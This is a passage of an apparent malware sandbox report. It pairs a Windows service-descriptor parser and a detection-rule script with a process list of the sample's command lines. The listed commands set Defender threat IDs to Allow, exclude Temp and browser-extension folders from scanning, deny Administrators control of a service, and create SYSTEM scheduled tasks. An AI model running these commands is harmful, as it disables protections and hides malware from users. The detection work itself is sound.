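WINDEFENDER_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Two-letter SDDL right codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}

# Well-known trustee abbreviations that occur in this descriptor.
TRUSTEES = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
            "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
            "WD": "Everyone"}

SDDL_RE = re.compile(r"^D:(?P<dacl>.*?)(?:S:(?P<sacl>.*))?$")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_acl(acl_text):
    """'(A;;CCLC;;;SY)(D;;WP;;;BA)' -> list of ACE dicts with decoded rights."""
    aces = []
    for body in ACE_RE.findall(acl_text or ""):
        ace_type, flags, rights, _obj, _inh_obj, sid = body.split(";")
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "sid": sid,
                     "rights": frozenset(SERVICE_RIGHTS.get(c, c) for c in codes)})
    return aces


def parse_sddl(sddl):
    """Split a D:...S:... string into its DACL and SACL ACE lists."""
    m = SDDL_RE.match(sddl)
    if not m:
        raise ValueError("expected a D:...S:... descriptor")
    return {"dacl": parse_acl(m.group("dacl")), "sacl": parse_acl(m.group("sacl"))}


def access_check(sddl, token_sids, requested):
    """Simplified model of the kernel's ordered DACL walk for a token holding token_sids.

    Allow ACEs grant bits until nothing requested remains; a deny ACE that matches the
    token and overlaps a still-ungranted requested bit rejects the request. Order matters
    (this DACL is non-canonical: the BA deny ACE follows the BA allow ACE), which is why
    this is simulated instead of computed as a plain set difference.
    """
    remaining = set(requested)
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["sid"] not in token_sids:
            continue
        if ace["type"] == "A":
            remaining -= ace["rights"]
            if not remaining:
                return True
        elif ace["type"] == "D" and remaining & ace["rights"]:
            return False
    return not remaining


def describe(sddl):
    """One human-readable line per DACL ACE, for a triage note."""
    lines = []
    for ace in parse_sddl(sddl)["dacl"]:
        verb = "ALLOW" if ace["type"] == "A" else "DENY"
        who = TRUSTEES.get(ace["sid"], ace["sid"])
        lines.append(f"{verb:5} {who}: {', '.join(sorted(ace['rights']))}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(WINDEFENDER_SDDL)))
    print("Administrators can stop:", access_check(WINDEFENDER_SDDL, {"BA"}, {"SERVICE_STOP"}))
    print("SYSTEM can stop:", access_check(WINDEFENDER_SDDL, {"SY"}, {"SERVICE_STOP"}))
```

Decoded, the DACL denies BUILTIN\Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, so sc stop or Stop-Service from an elevated prompt fails with access denied, while INTERACTIVE and SERVICE get query-only rights. The same BA allow ACE still grants WRITE_DAC, SERVICE_CHANGE_CONFIG and DELETE, so an administrator can sdset a sane descriptor back or delete the service outright, and a token carrying the SYSTEM SID is granted SERVICE_STOP by the first ACE before the deny is ever reached.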

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe em /OQsite_idAGR 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
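Detection logic for the defence-evasion and persistence commands in this process list, as an added example that is not part of the report: it scans process command lines for the Defender exclusion added through the MSFT_MpPreference WMI class, the ThreatIDDefaultAction policy values that set a threat's default action to Allow, the netsh allow rule for the fake csrss.exe, the scheduled tasks created with /RL HIGHEST or /RU SYSTEM, the sc sdset that denies Administrators on the service, and the forfiles proxy execution. The rules and finding names are my own; the sample input is copied from the report's own command lines, abridged to one ThreatIDDefaultAction batch with the powershell line cut to three REG ADD calls; the meaning of ThreatIDDefaultAction value 6 (Allow) is the documented Defender policy value.

```python
import re

# Command lines copied from this report's process list. Constructed subset for the
# example: one ThreatIDDefaultAction batch, with the powershell line cut to three REG ADDs.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F',
    r'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32',
    r'powershell -nologo -noprofile',
]

# Documented ThreatIDDefaultAction values: 6 == Allow is the one that neuters detections.
DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                    "8": "UserDefined", "9": "NoAction", "10": "Block"}

EXCLUSION_RE = re.compile(r"MSFT_MpPreference\s+call\s+Add\s+(Exclusion\w+)=(\S+)", re.I)
# Tolerates both the \"-escaped form inside the powershell string and the bare reg.exe form.
THREAT_RE = re.compile(r'ThreatIDDefaultAction\\?"?\s+/f\s+/v\s+\\?"?(\d+)\\?"?\s+/t\s+REG_SZ\s+/d\s+(\d+)', re.I)
NETSH_RE = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\s+(.*)", re.I)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
SC_SDSET_RE = re.compile(r'\bsc(?:\.exe)?"?\s+sdset\s+(\S+)\s+(\S+)', re.I)
FORFILES_RE = re.compile(r'forfiles(?:\.exe)?"?\s+.*?/c\s+"(.*)"', re.I)


def _opt(line, flag):
    """Value of a schtasks-style /FLAG argument, surrounding quotes removed (None if absent)."""
    m = re.search(rf'/{flag}\s+("(?:[^"\\]|\\.)*"|\S+)', line, re.I)
    return m.group(1).strip('"') if m else None


def rule_defender_exclusion(line):
    m = EXCLUSION_RE.search(line)
    if m:
        return {"rule": "defender_exclusion", "kind": m.group(1), "value": m.group(2)}


def rule_threat_allow(line):
    pairs = THREAT_RE.findall(line)
    allowed = sorted({tid for tid, action in pairs if DEFENDER_ACTIONS.get(action) == "Allow"})
    if allowed:
        return {"rule": "defender_threat_allow", "threat_ids": allowed}


def rule_firewall_allow(line):
    m = NETSH_RE.search(line)
    if m:
        kv = {k.lower(): v.strip('"') for k, v in KV_RE.findall(m.group(1))}
        if kv.get("action", "").lower() == "allow":
            return {"rule": "firewall_allow_rule", "name": kv.get("name"), "program": kv.get("program")}


def rule_task_elevated(line):
    if SCHTASKS_RE.search(line):
        run_level, run_as = (_opt(line, "RL") or "").upper(), (_opt(line, "RU") or "").upper()
        if run_level == "HIGHEST" or run_as == "SYSTEM":
            return {"rule": "scheduled_task_elevated", "name": _opt(line, "TN"),
                    "trigger": _opt(line, "SC"), "command": _opt(line, "TR"),
                    "run_level": run_level or None, "run_as": run_as or None}


def rule_service_dacl(line):
    m = SC_SDSET_RE.search(line)
    if m and re.search(r"\(D;[^)]*;;;BA\)", m.group(2)):
        return {"rule": "service_dacl_denies_admins", "service": m.group(1)}


def rule_forfiles(line):
    m = FORFILES_RE.search(line)
    if m:
        return {"rule": "forfiles_proxy_exec", "payload": m.group(1)}


RULES = [rule_defender_exclusion, rule_threat_allow, rule_firewall_allow,
         rule_task_elevated, rule_service_dacl, rule_forfiles]


def scan(cmdlines):
    """Run every rule over every command line; one finding dict per hit."""
    return [hit for line in cmdlines for rule in RULES if (hit := rule(line))]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

The exclusion and forfiles rules fire on the same line, which is the point: the forfiles /c wrapper, the cmd, the powershell and the WMIC process each carry the same MSFT_MpPreference string, so a parent-child-agnostic command-line match catches the chain at every hop. The threat-ID rule collects the numeric IDs so an analyst can map them to Defender's own names with Get-MpThreatCatalog on a clean host.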

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

